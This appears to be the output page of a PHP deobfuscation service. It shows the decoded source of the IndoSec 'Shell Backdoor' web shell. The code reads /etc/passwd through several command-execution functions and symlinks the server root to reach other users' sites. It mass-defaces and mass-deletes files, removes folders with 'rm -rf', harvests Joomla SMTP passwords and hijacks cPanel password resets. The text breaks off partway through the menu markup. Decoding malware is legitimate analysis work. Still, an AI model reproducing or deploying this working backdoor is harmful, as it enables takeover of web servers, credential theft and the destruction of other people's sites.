Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto LB30f; sUlgs: $default_action = "\x46\151\x6c\145\163\115\x61\156"; goto sI6zX..

Decoded Output download

 <?php goto LB30f; sUlgs: $default_action = "FilesMan"; goto sI6zX; f2PCb: $web = $_SERVER["HTTP_HOST"]; goto WRL5A; hw3d7: if ($_GET["aksi"] == "passwbypass") { echo "<div claas="container">
\x9\x9	<form method="POST">
\x9\x9\x9\x9<p class="text-center">Bypass etc/passwd With :</p>
		\x9	<div class="d-flex justify-content-center flex-wrap">\xa	\x9\x9		<input type="submit" class="fiture btn btn-danger btn-sm" value="System Function" name="syst">\xa	\x9\x9		<input type="submit" class="fiture btn btn-danger btn-sm" value="Passthru Function" name="passth">\xa	\x9			<input type="submit" class="fiture btn btn-danger btn-sm" value="Exec Function" name="ex">\xa\x9\x9		\x9<input type="submit" class="fiture btn btn-danger btn-sm" value="Shell_exec Function" name="shex">\xa		\x9		<input type="submit" class="fiture btn btn-danger btn-sm" value="Posix_getpwuid Function" name="melex">
	\x9		</div><hr/>
		\x9	<p class="text-center">Bypass User With :</p>
	\x9		<div class="d-flex justify-content-center flex-wrap">
				\x9<input type="submit" class="fiture btn btn-warning btn-sm" value="Awk Program" name="awkuser">
	\x9\x9	\x9<input type="submit" class="fiture btn btn-warning btn-sm" value="System Function" name="systuser">
		\x9		<input type="submit" class="fiture btn btn-warning btn-sm" value="Passthru Function" name="passthuser">\x9\xa			\x9\x9<input type="submit" class="fiture btn btn-warning btn-sm" value="Exec Function" name="exuser">\x9	\xa\x9				<input type="submit" class="fiture btn btn-warning btn-sm" value="Shell_exec Function" name="shexuser">
\x9\x9		</div>
\x9\x9\x9</form>"; $mail = "ls /var/mail"; $paswd = "/etc/passwd"; if ($_POST["syst"]) { echo "<textarea class='form-control' rows='13'>"; echo system("cat {$paswd}"); echo "</textarea><br/>"; } if ($_POST["passth"]) { echo "<textarea class='form-control' rows='13'>"; echo passthru("cat {$paswd}"); echo "</textarea><br/>"; } if ($_POST["ex"]) { echo "<textarea class='form-control' rows='13'>"; echo exec("cat {$paswd};"); echo "</textarea><br/>"; } if ($_POST["shex"]) { echo "<textarea class='form-control' rows='13'>"; echo shell_exec("cat {$paswd}"); echo "</textarea><br/>"; } if ($_POST["melex"]) { echo "<textarea class='form-control' rows='13'>"; for ($uid = 0; $uid < 60000; $uid++) { $ara = posix_getpwuid($uid); if (!empty($ara)) { while (list($key, $val) = each($ara)) { print "{$val}:"; } print "n"; } } echo "</textarea><br/>"; } if ($_POST["awkuser"]) { echo "<textarea class='form-control' rows='13'>
				" . shell_exec("awk -F: '{ print $1 }' {$paswd} | sort") . "\xa		\x9	</textarea><br/>"; } if ($_POST["systuser"]) { echo "<textarea class='form-control' rows='13'>"; echo system("{$mail}"); echo "</textarea><br>"; } if ($_POST["passthuser"]) { echo "<textarea class='form-control' rows='13'>"; echo passthru("{$mail}"); echo "</textarea><br>"; } if ($_POST["exuser"]) { echo "<textarea class='form-control' rows='13'>"; echo exec($mail); echo "</textarea><br>"; } if ($_POST["shexuser"]) { echo "<textarea class='form-control' rows='13'>"; echo shell_exec("{$mail}"); echo "</textarea><br>"; } echo "</div>"; die; } goto V40Ns; oqZvC: if (isset($_GET["dir"])) { $dir = $_GET["dir"]; chdir($dir); } else { $dir = getcwd(); } goto k1N0A; n0tKq: foreach ($scandir as $file) { if (!is_file($path . "/" . $file)) { continue; } $size = filesize($path . "/" . $file) / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . " MB"; } else { $size = $size . " KB"; } echo "<tr>
		\x9		\x9<td><img src=""; $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION)); if ($ext == "php") { echo "https://image.flaticon.com/icons/png/128/337/337947.png""; } elseif ($ext == "html") { echo "https://image.flaticon.com/icons/png/128/136/136528.png""; } elseif ($ext == "css") { echo "https://image.flaticon.com/icons/png/128/136/136527.png""; } elseif ($ext == "png") { echo "https://image.flaticon.com/icons/png/128/136/136523.png""; } elseif ($ext == "jpg") { echo "https://image.flaticon.com/icons/png/128/136/136524.png""; } elseif ($ext == "jpeg") { echo "http://i.imgur.com/e8mkvPf.png""; } elseif ($ext == "zip") { echo "https://image.flaticon.com/icons/png/128/136/136544.png""; } elseif ($ext == "js") { echo "https://image.flaticon.com/icons/png/128/1126/1126856.png"; } elseif ($ext == "ttf") { echo "https://image.flaticon.com/icons/png/128/1126/1126892.png"; } elseif ($ext == "otf") { echo "https://image.flaticon.com/icons/png/128/1126/1126891.png"; } elseif ($ext == "txt") { echo "https://image.flaticon.com/icons/png/128/136/136538.png"; } elseif ($ext == "ico") { echo "https://image.flaticon.com/icons/png/128/1126/1126873.png"; } elseif ($ext == "conf") { echo "https://image.flaticon.com/icons/png/512/1573/1573301.png"; } elseif ($ext == "htaccess") { echo "https://image.flaticon.com/icons/png/128/1720/1720444.png"; } elseif ($ext == "sh") { echo "https://image.flaticon.com/icons/png/128/617/617535.png"; } elseif ($ext == "py") { echo "https://image.flaticon.com/icons/png/128/180/180867.png"; } elseif ($ext == "indsc") { echo "https://image.flaticon.com/icons/png/512/1265/1265511.png"; } elseif ($ext == "sql") { echo "https://img.icons8.com/ultraviolet/2x/data-configuration.png"; } elseif ($ext == "pl") { echo "http://i.imgur.com/PnmX8H9.png"; } elseif ($ext == "pdf") { echo "https://image.flaticon.com/icons/png/128/136/136522.png"; } elseif ($ext == "mp4") { echo "https://image.flaticon.com/icons/png/128/136/136545.png"; } elseif ($ext == "mp3") { echo "https://image.flaticon.com/icons/png/128/136/136548.png"; } elseif ($ext == "git") { echo "https://image.flaticon.com/icons/png/128/617/617509.png"; } elseif ($ext == "md") { echo "https://image.flaticon.com/icons/png/128/617/617520.png"; } else { echo "http://icons.iconarchive.com/icons/zhoolego/material/256/Filetype-Docs-icon.png"; } echo "" class="ico2"></img>"; if (strlen($file) > 25) { $_file = substr($file, 0, 25) . "...-." . $ext; } else { $_file = $file; } echo " <a href="?dir=" . $path . "&aksi=view&file=" . $path . "/" . $file . "">" . $_file . "</a></td>\xa\x9	\x9\x9\x9<td class="text-center d-flex">" . $size . "</td>
	\x9			<td><a href="?dir=" . $path . "&aksi=chmod&file=" . $path . "/" . $file . "" class="text-center">"; if (is_writable($path . "/" . $file)) { echo "<font color="#00ff00">"; } elseif (!is_readable($path . "/" . $file)) { echo "<font color="red">"; } echo perms($path . "/" . $file); if (is_writable($path . "/" . $file) || !is_readable($path . "/" . $file)) { echo "</font></a></td>\xa\x9		\x9\x9<td class="text-center d-flex">\xa	\x9	\x9\x9\x9<a title="Lihat" class="badge badge-info" href="?dir=" . $path . "&aksi=view&file=" . $path . "/" . $file . "">&nbsp;<i class="fa fa-eye"></i>&nbsp;</a>&nbsp;&nbsp;\xa	\x9\x9\x9\x9\x9<a title="Edit" class="badge badge-success" href="?dir=" . $path . "&aksi=edit&file=" . $path . "/" . $file . "">&nbsp;<i class="far fa-edit"></i>&nbsp;</a>&nbsp;&nbsp;\xa\x9\x9				<a title="Rename" class="badge badge-success" href="?dir=" . $path . "&aksi=rename&file=" . $path . "/" . $file . "">&nbsp;<i class="fa fa-pencil"></i>&nbsp;</a>&nbsp;&nbsp;
\x9\x9		\x9	<a class="badge badge-danger" href="?dir=" . $path . "&aksi=hapusf&file=" . $path . "/" . $file . "" title="Delete">&nbsp;<i class="fa fa-trash"></i>&nbsp;</a>&nbsp;&nbsp;
			\x9		<a class="badge badge-primary" href="?&dir=" . $path . "&aksi=download&file=" . $path . "/" . $file . "" title="Download">&nbsp;<i class="fa fa-download"></i>&nbsp;</a>
\x9	\x9	\x9</td>
\x9\x9\x9	</tr>"; } } goto y7fjP; PoD22: if ($_GET["aksi"] == "sym_bypas") { if (isset($_GET["save"]) and isset($_POST["file"]) or @filesize("passwd.txt") > 0) { $cont = stripcslashes($_POST["file"]); if (!file_exists("passwd.txt")) { $f = @fopen("passwd.txt", "w"); $w = @fwrite($f, $cont); fclose($f); } if ($w or @filesize("passwd.txt") > 0) { echo "<div class='tmp'>
		\x9	\x9<table class='text-center table-responsive'>
\x9\x9	\x9\x9\x9<thead class='bg-info'>
\x9		\x9\x9		<th>Users</th>
\x9	\x9		\x9\x9<th>symlink</th>
\x9	\x9	\x9		<th>FTP</th>\xa	\x9				</thead>"; flush(); $fil3 = file("passwd.txt"); foreach ($fil3 as $f) { $u = explode(":", $f); $user = $u["0"]; echo "<tr>
\x9		\x9	\x9\x9	<td class='text-left pl-1'>{$user}</td>\xa			\x9\x9\x9	\x9<td>
\x9\x9\x9\x9	\x9\x9	\x9<a href='sym/root/home/{$user}/public_html' target='_blank'>Symlink </a>\xa			\x9				</td>\xa\x9	\x9\x9\x9\x9\x9	<td>\xa		\x9\x9\x9\x9\x9	\x9<a href='{$pageFTP}/sym/root/home/{$user}/public_html' target='_blank'>FTP</a>
		\x9		\x9	\x9</td>\xa	\x9				\x9</tr>"; flush(); flush(); } die("</tr></table></div>"); } } echo "read /etc/passwd
\x9\x9<form method='post' action='?dir={$dir}&aksi=sym_bypas&save=1'>
	\x9\x9<textarea class='form-control' rows='8' name='file'>"; flush(); $file = "/etc/passwd"; $r3ad = @fopen($file, "r"); if ($r3ad) { $content = @fread($r3ad, @filesize($file)); echo '' . htmlentities($content) . ''; } elseif (!$r3ad) { $r3ad = @show_source($file); } elseif (!$r3ad) { $r3ad = @highlight_file($file); } elseif (!$r3ad) { for ($uid = 0; $uid < 1000; $uid++) { $ara = posix_getpwuid($uid); if (!empty($ara)) { while (list($key, $val) = each($ara)) { print "{$val}:"; } print "
"; } } } flush(); echo "</textarea><br/>\xa			<input type='submit' class='btn btn-danger btn-block' value='Symlink'/>\xa\x9\x9</form>"; flush(); die; } goto kOh3B; Ednnu: if ($_GET["aksi"] == "masdef") { function tipe_massal($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $lokasi = $dirc . "/" . $namafile; if ($dirb === ".") { file_put_contents($lokasi, $isi_script); } elseif ($dirb === "..") { file_put_contents($lokasi, $isi_script); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "Done > {$lokasi}\xa"; file_put_contents($lokasi, $isi_script); $masdef = tipe_massal($dirc, $namafile, $isi_script); } } } } } } function tipe_biasa($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $lokasi = $dirc . "/" . $namafile; if ($dirb === ".") { file_put_contents($lokasi, $isi_script); } elseif ($dirb === "..") { file_put_contents($lokasi, $isi_script); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "Done > {$dirb}/{$namafile}\xa"; file_put_contents($lokasi, $isi_script); } else { echo "<p>gagal</p>"; } } } } } } if ($_POST["start"]) { echo "[ <a href='?dir={$dir}'>Kembali</a> ]
\x9	\x9<textarea class='form-control' rows='7' disabled=''>"; if ($_POST["tipe"] == "mahal") { tipe_massal($_POST["d_dir"], $_POST["d_file"], $_POST["script"]); } elseif ($_POST["tipe"] == "murah") { tipe_biasa($_POST["d_dir"], $_POST["d_file"], $_POST["script"]); } echo "</textarea><br/>"; } else { echo "<form method='post'>
\x9		\x9<center>
			\x9	<h5>Tipe :</h5>\xa\x9	\x9		<input id='toggle-on' class='toggle toggle-left' name='tipe' value='murah' type='radio' checked>
\x9\x9\x9		<label for='toggle-on' class='butn'>Biasa</label>\xa\x9\x9	\x9	<input id='toggle-off' class='toggle toggle-right' name='tipe' value='mahal' type='radio'>
\x9		\x9\x9<label for='toggle-off' class='butn'>Masal</label>
\x9			</center> \xa		\x9\x9<h5><i class='fa fa-folder'></i> Lokasi :</h5>\xa			\x9<input type='text' name='d_dir' value='{$dir}' class='form-control'><br>
	\x9\x9	<h5><i class ='fa fa-file'></i> Nama File :</h5>\xa\x9	\x9	<input type='text' name='d_file' autocomplete='off' placeholder='[Ex] index.php' class='form-control'><br/>\xa	\x9\x9\x9<h5><i class ='fa fa-file'></i> Isi File :</h5>\xa	\x9\x9\x9<textarea name='script' class='form-control' rows='5' autocomplete='off' placeholder='[Ex] Hacked By { IndoSec }'></textarea><br/>
		\x9	<input type='submit' name='start' value='Mass Deface' class='btn btn-danger form-control'><br/>\xa			</form>"; } die; } goto fnGp0; xEaUB: $scdir = explode("/", $dir); goto pbQJd; xQnAH: if ($_GET["aksi"] == "chmod") { $nama = basename($_GET["file"]); echo "<form method='POST'>\xa	\x9	\x9<h5>Chmod File : {$nama} </h5>
\x9			<div class='form-group input-group'>
	\x9			<input type='text' name='perm' class='form-control' value='" . substr(sprintf("%o", fileperms($_GET["file"])), -4) . "'>\xa\x9	\x9\x9	<input type='submit' class='btn btn-danger form-control' value='Chmod'>\xa		\x9	</div>\xa\x9	\x9</form>"; if (isset($_POST["perm"])) { if (chmod($_GET["file"], $_POST["perm"])) { echo "<font color="lime">Change Permission Berhasil</font><br/>"; } else { echo "<font color="white">Change Permission Gagal</font><br/>"; } } } goto JOAz0; ny8eb: @ini_set("max_execution_time", 0); goto XhlRY; VIISu: function exe($cmd) { if (function_exists("system")) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif (function_exists("exec")) { @exec($cmd, $results); $buff = ''; foreach ($results as $result) { $buff .= $result; } return $buff; } elseif (function_exists("passthru")) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif (function_exists("shell_exec")) { $buff = @shell_exec($cmd); return $buff; } } goto PJRU9; O0b8k: if ($_GET["aksi"] == "symlink") { $full = str_replace($_SERVER["DOCUMENT_ROOT"], '', $path); $d0mains = @file("/etc/named.conf"); if (!$d0mains) { die("[ <a href='?dir={$path}&aksi=symread'>Bypass Read</a> ] [ <a href='?dir={$path}&aksi=sym_404'>Symlink 404</a> ] [ <a href='?dir={$path}&aksi=sym_bypas'>Symlink Bypass</a> ]<br/><font color='red'>Error tidak dapat membaca  /etc/named.conf</font><br/><br/>"); } if ($d0mains) { @mkdir("indsc_sym", 511); @chdir("indsc_sym"); @exe("ln -s / root"); $file3 = "Options Indexes FollowSymLinks
		\x9DirectoryIndex indsc.html
			AddType text/plain .php\xa	\x9\x9AddHandler text/plain .php\xa	\x9\x9Satisfy Any"; $fp3 = fopen(".htaccess", "w"); $fw3 = fwrite($fp3, $file3); @fclose($fp3); echo "[ <a href='?dir={$path}&aksi=symread'>Bypass Read</a> ] [ <a href='?dir={$path}&aksi=sym_404'>Symlink 404</a> ] [ <a href='?dir={$path}&aksi=sym_bypas'>Symlink Bypass</a> ]
	\x9	<div class='tmp'>\xa\x9\x9\x9<table class='text-center table-responsive'>\xa\x9	\x9\x9<thead class='bg-info'>\xa			\x9	<th>No.</th>
				\x9<th>Domains</th>\xa	\x9			<th>Users</th>\xa\x9		\x9	<th>symlink </th>\xa\x9\x9		</thead>"; $dcount = 1; foreach ($d0mains as $d0main) { if (eregi("zone", $d0main)) { preg_match_all("#zone "(.*)"#", $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0])); echo "<tr>
				\x9\x9		<td>" . $dcount . "</td>
\x9	\x9\x9\x9\x9		<td class='text-left'><a href=http://www." . $domains[1][0] . "/>" . $domains[1][0] . "</a></td>\xa\x9\x9\x9\x9\x9\x9		<td>" . $user["name"] . "</td>
		\x9		\x9\x9	<td><a href='{$full}/indsc_sym/root/home/" . $user["name"] . "/public_html' target='_blank'>Symlink</a></td>\xa\x9\x9\x9\x9\x9\x9	</tr>"; flush(); $dcount++; } } } echo "</table></div>"; } else { $TEST = @file("/etc/passwd"); if ($TEST) { @mkdir("indsc_sym", 511); @chdir("indsc_sym"); @exe("ln -s / root"); $file3 = "Options Indexes FollowSymLinks
	\x9		DirectoryIndex indsc.html\xa\x9	\x9\x9AddType text/plain .php\xa\x9\x9	\x9AddHandler text/plain .php
\x9			Satisfy Any"; $fp3 = fopen(".htaccess", "w"); $fw3 = fwrite($fp3, $file3); @fclose($fp3); echo "[ <a href='?dir={$path}&aksi=symread'>Bypass Read</a> ] [ <a href='?dir={$path}&aksi=sym_404'>Symlink 404</a> ] [ <a href='?dir={$path}&aksi=sym_bypas'>Symlink Bypass</a> ]\xa\x9\x9\x9	<div class='tmp'>
	\x9\x9\x9<table class='text-center table-responsive'>
\x9\x9\x9	\x9<thead class='bg-warning'>\xa\x9\x9		\x9	<th>No.</th>\xa			\x9\x9\x9<th>Users</th>
\x9\x9\x9	\x9\x9<th>symlink </th>\xa\x9\x9\x9		</thead>"; $dcount = 1; $file = fopen("/etc/passwd", "r") or die("Unable to open file!"); while (!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match("/\/(.*?)\:\//s", $s, $matches); $matches = str_replace("home/", '', $matches[1]); if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") { continue; } echo "<tr>\xa						\x9<td>" . $dcount . "</td>\xa\x9		\x9\x9	\x9<td>" . $matches . "</td>
\x9	\x9				<td><a href={$full}/indsc_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td>
\x9\x9	\x9\x9	</tr>"; $dcount++; } fclose($file); echo "</table></div>"; } else { if ($os != "Windows") { @mkdir("indsc_sym", 511); @chdir("indsc_sym"); @exe("ln -s / root"); $file3 = "Options Indexes FollowSymLinks
\x9\x9\x9	DirectoryIndex indsc.html\xa\x9		\x9AddType text/plain .php
	\x9		AddHandler text/plain .php
				Satisfy Any"; $fp3 = fopen(".htaccess", "w"); $fw3 = fwrite($fp3, $file3); @fclose($fp3); echo "[ <a href='?dir={$path}&aksi=symread'>Bypass Read</a> ] [ <a href='?dir={$path}&aksi=sym_404'>Symlink 404</a> ] [ <a href='?dir={$path}&aksi=sym_bypas'>Symlink Bypass</a> ]\xa	\x9	\x9<div class='tmp'>\xa	\x9	\x9<table class='text-center table-responsive'>
			\x9\x9<thead class='bg-danger'>\xa\x9	\x9	\x9	<th>ID.</th>
		\x9\x9		<th>Users</th>\xa		\x9	\x9\x9<th>symlink </th>
\x9\x9\x9		</thead>"; $temp = ''; $val1 = 0; $val2 = 1000; for (; $val1 <= $val2; $val1++) { $uid = @posix_getpwuid($val1); if ($uid) { $temp .= join(":", $uid) . "\xa"; } } echo "<br/>"; $temp = trim($temp); $file5 = fopen("test.txt", "w"); fputs($file5, $temp); fclose($file5); $dcount = 1; $file = fopen("test.txt", "r") or die("Unable to open file!"); while (!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match("/\/(.*?)\:\//s", $s, $matches); $matches = str_replace("home/", '', $matches[1]); if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") { continue; } echo "<tr>
	\x9	\x9\x9		<td>" . $dcount . "</td>\xa\x9\x9\x9				<td>" . $matches . "</td>
\x9\x9\x9	\x9		<td><a href={$full}/indsc_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td>\xa\x9			\x9\x9</tr>"; $dcount++; } fclose($file); echo "</table></div>"; unlink("test.txt"); } } } die; } goto QpB05; PDFOO: if ($_GET["aksi"] == "smtpgrab") { function scj($path) { $paths = scandir($path); foreach ($paths as $pathb) { if (!is_file("{$path}/{$pathb}")) { continue; } $ambil = file_get_contents("{$path}/{$pathb}"); $ambil = str_replace("$", '', $ambil); if (preg_match("/JConfig|joomla/", $ambil)) { $smtp_host = ambilkata($ambil, "smtphost = '", "'"); $smtp_auth = ambilkata($ambil, "smtpauth = '", "'"); $smtp_user = ambilkata($ambil, "smtpuser = '", "'"); $smtp_pass = ambilkata($ambil, "smtppass = '", "'"); $smtp_port = ambilkata($ambil, "smtpport = '", "'"); $smtp_secure = ambilkata($ambil, "smtpsecure = '", "'"); echo "<table class='text-white table table-bordered'>
\x9\x9	\x9		<tr>\xa	\x9\x9	\x9\x9\x9<td>SMTP Host: {$smtp_host}</td>\xa	\x9	\x9\x9\x9</tr>\xa\x9				\x9<tr>\xa			\x9	\x9\x9<td>SMTP Port: {$smtp_port}</td>
\x9			\x9\x9</tr>
\x9\x9\x9	\x9	<tr>\xa	\x9		\x9\x9\x9<td>SMTP User: {$smtp_user}</td>
		\x9			</tr>\xa	\x9\x9\x9\x9\x9<tr>\xa\x9		\x9			<td>SMTP Pass: {$smtp_pass}</td>
\x9\x9	\x9	\x9</tr>\xa	\x9\x9		\x9<tr>
\x9\x9\x9	\x9\x9	<td>SMTP Auth: {$smtp_auth}</td>
				\x9\x9</tr>\xa\x9		\x9\x9\x9<tr>
					\x9\x9<td>SMTP Secure: {$smtp_secure}</td>
\x9\x9	\x9	\x9</tr>
\x9\x9	\x9\x9</table>"; } } } echo "<p class='text-muted'>NB : Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/namafolder_config )</p>"; $smtp = scj($path); die; } goto OKr2f; vGSQa: $free = disk_free_space($path); goto Dq2KF; WRL5A: $sof = $_SERVER["SERVER_SOFTWARE"]; goto VHfhx; TncqD: if ($_GET["aksi"] == "rename_folder") { $nama = basename(getcwd()); $output = "\xa\x9\x9\x9[ <a href='?dir=" . $dir . "&aksi=rename_folder'>Rename</a> ]  [ <a href='?dir=" . $dir . "&aksi=hapus_folder'>Delete</a> ] \xa\x9\x9	<h4><img src='http://aux.iconspalace.com/uploads/folder-icon-256-1787672482.png' class='ico'></img> Rename Folder : {$nama} </h4>\xa	\x9	<form method='POST'>
	\x9	\x9<input type='text' class='form-control' name='namanew' autocomplete='off' placeholder='Masukan Nama Baru...'><br/>\xa\x9\x9		<button type='sumbit' class='btn btn-info btn-block' name='ganti'>Ganti!!</button><br/>\xa		\x9</form>"; echo $output; if (isset($_POST["ganti"])) { $lama = $dir; $baru = $_POST["namanew"]; $ubah = rename($lama, $baru); if ($ubah) { echo "<script>window.location='?dir=" . dirname($dir) . "'; alert('Berhasil Mengganti Nama');</script>"; } else { echo "<script>alert('Gagal Mengganti Nama');</script>"; } } die; } goto svX8T; yBPPy: if ($_GET["aksi"] == "rename") { $nama = basename($file); echo "[ <a href="?dir=" . $dir . "&aksi=view&file=" . $file . "">Lihat</a> ]  [ <a href="?dir=" . $dir . "&aksi=edit&file=" . $file . "">Edit</a> ]  [ <a class="active" href="?dir=" . $dir . "&aksi=rename&file=" . $file . "">Rename</a> ]  [ <a href="?dir=" . $dir . "&aksi=hapusf&file=" . $file . "">Delete</a> ]"; echo "<form method='POST'>
\x9		\x9<h5><i class='fa fa-file'></i> Rename File : {$nama}</h5>\xa	\x9\x9\x9<input type='text' class='form-control' name='namanew' autocomplete='off' placeholder='Masukan Nama Baru...'><br/>\xa\x9\x9\x9	<button type='sumbit' class='btn btn-info btn-block' name='rename_file'>Update</button>
\x9\x9\x9</form>"; if (isset($_POST["rename_file"])) { $lama = $file; $baru = $_POST["namanew"]; rename($baru, $lama); if (file_exists($baru)) { echo "<script>alert("Nama " . $baru . " Telah Digunakan");</script>"; } else { if (rename($lama, $baru)) { echo "<script>window.location="?dir=" . $dir . ""; alert("Sukses Mengganti Nama Menjadi " . $baru . "");</script>"; } else { echo "<script>alert("Gagal Mengganti Nama");</script>"; } } } } goto XV3ue; fJEHo: if ($_GET["aksi"] == "hapus_folder") { $nama = basename(getcwd()); $output = "\xa\x9\x9\x9[ <a href='?dir=" . $dir . "&aksi=rename_folder'>Rename</a> ]  [ <a href='?dir=" . $dir . "&aksi=hapus_folder'>Delete</a> ] \xa			<div class='card card-body text-center'>\xa\x9\x9	\x9<font color='black'>Apakah Yakin Menghapus : {$nama} ?</font>\xa\x9\x9	\x9<form method='POST'>\xa				\x9<a class='btn btn-danger btn-block' href='?dir=" . dirname($dir) . "'>Tidak</a>
	\x9	\x9\x9<input type='submit' name='ya' class='btn btn-success btn-block' value='Ya'>\xa\x9			</form>\xa\x9	\x9</div><br/>"; echo $output; if ($_POST["ya"]) { if (is_dir($dir)) { if (is_writable($dir)) { @rmdir($dir); @exe("rm -rf {$dir}"); @exe("rmdir /s /q {$dir}"); echo "<script>window.location='?dir=" . dirname($dir) . "'; alert('Berhasil Menghapus " . $nama . "');</script>"; } else { echo "<script>window.location='?dir=" . dirname($dir) . "'; alert('Tidak Dapat Menghapus " . $nama . "');</script>"; } } } die; } goto TncqD; DE8WR: echo "<div id="tab"><table class="text-white mt-1 table-hover table-responsive">\xa	\x9	<thead class="bg-info text-center">\xa\x9	\x9	<th class="text-left">File/Folder</th>
	\x9\x9	<th>Size</th>\xa	\x9	\x9<th>Permission</th>
			\x9<th>Action</th>\xa			</thead>"; goto xn6PP; kOh3B: if ($_GET["aksi"] == "resetpasscp") { echo "<h5 class="text-center"><i class="fa fa-key"></i> Auto Reset Password Cpanel</h5>\xa\x9	<form method="POST">
\x9		<div class="form-group">\xa\x9\x9	\x9<input type="email" name="email" class="form-control" placeholder="Masukan Email..."/><br/>
			\x9<input type="submit" name="submit" class="btn btn-danger btn-block" value="Send"/>\xa	\x9\x9</div>\xa	\x9</form>"; if (isset($_POST["submit"])) { $user = get_current_user(); $site = $_SERVER["HTTP_HOST"]; $ips = getenv("REMOTE_ADDR"); $email = $_POST["email"]; $wr = "email:" . $email; $f = fopen("/home/" . $user . "/.cpanel/contactinfo", "w"); fwrite($f, $wr); fclose($f); $f = fopen("/home/" . $user . "/.contactinfo", "w"); fwrite($f, $wr); fclose($f); $parm = $site . ":2082/resetpass?start=1"; echo "<br/>Url: " . $parm . ''; echo "<br/>Username: " . $user . ''; echo "<br/>Success Reset To: " . $email . "<br/><br/>"; } die; } goto VpdbN; VHfhx: $dir = str_replace("\", "/", $dir); goto xEaUB; svX8T: if ($_GET["aksi"] == "masdel") { function hapus_massal($dir, $namafile) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $lokasi = $dirc . "/" . $namafile; if ($dirb === ".") { if (file_exists("{$dir}/{$namafile}")) { unlink("{$dir}/{$namafile}"); } } elseif ($dirb === "..") { if (file_exists('' . dirname($dir) . "/{$namafile}")) { unlink('' . dirname($dir) . "/{$namafile}"); } } else { if (is_dir($dirc)) { if (is_writable($dirc)) { if ($lokasi) { echo "{$lokasi} > Terhapus\xa"; unlink($lokasi); $massdel = hapus_massal($dirc, $namafile); } } } } } } } if ($_POST["start"]) { echo "[ <a href='?dir={$dir}'>Kembali</a> ]
				<textarea class='form-control' rows='7' disabled=''>"; hapus_massal($_POST["d_dir"], $_POST["d_file"]); echo "</textarea><br/>"; } else { echo "<form method='post'>\xa\x9\x9\x9\x9\x9<h5><i class='fa fa-folder'></i> Lokasi :</h5>\xa\x9	\x9	\x9<input type='text' name='d_dir' value='{$dir}' class='form-control'><br>\xa					<h5><i class ='fa fa-file'></i> Nama File :</h5>
\x9\x9			<input type='text' name='d_file' autocomplete='off' placeholder='[Ex] index.php' class='form-control'><br>\xa	\x9\x9\x9\x9<input type='submit' name='start' value='Delete!!' class='btn btn-danger form-control'>
\x9\x9\x9</form>"; } die; } goto Ednnu; zsyBf: echo "\xa\x9\x9<div class="container">\xa\x9\x9\x9<h1 class="text-center"><a href="https://facebook.com/IndoSecOfficial" style="color:#ffffff;">{ INDOSEC }</h1>\xa	\x9\x9<center><h5>Shell Backdoor</a></h5></center>
\x9	\x9<hr/>\xa\x9\x9	<div class="text-center">\xa				<div class="d-flex justify-content-center flex-wrap">\xa			\x9	<a href="?" class="fiture btn btn-danger btn-sm"><i class="fa fa-home"></i> Home</a>
			\x9	<a href="?dir=" . $dir . "&aksi=upload" class="fiture btn btn-danger btn-sm"><i class="fa fa-upload"></i> Upload</a>\xa	\x9\x9\x9	<a href="?dir=" . $dir . "&aksi=buat_file" class="fiture btn btn-danger btn-sm"><i class="fa fa-plus-circle"></i> Buat File</a>\xa\x9\x9\x9\x9	<a href="?dir=" . $dir . "&aksi=buat_folder" class="fiture btn btn-danger btn-sm"><i class="fa fa-plus"></i> Buat Folder</a>
\x9\x9\x9		<a href="?dir=" . $dir . "&aksi=masdef" class="fiture btn btn-danger btn-sm"><i class="fa fa-exclamation-triangle"></i> Mass Deface</a>
\x9	\x9\x9	<a href="?dir=" . $dir . "&aksi=masdel" class="fiture btn btn-danger btn-sm"><i class="fa fa-trash"></i> Mass Delete</a>
	\x9	\x9\x9<a href="?dir=" . $dir . "&aksi=jumping" class="fiture btn btn-danger btn-sm"><i class="fa fa-exclamation-triangle"></i> Jumping</a>\xa\x9\x9		\x9<a href="?dir=" . $dir . "&aksi=config" class="fiture btn btn-danger btn-sm"><i class="fa fa-cogs"></i> Config</a>\xa				\x9<a href="?dir=" . $dir . "&aksi=adminer" class="fiture btn btn-danger btn-sm"><i class="fa fa-user"></i> Adminer</a>
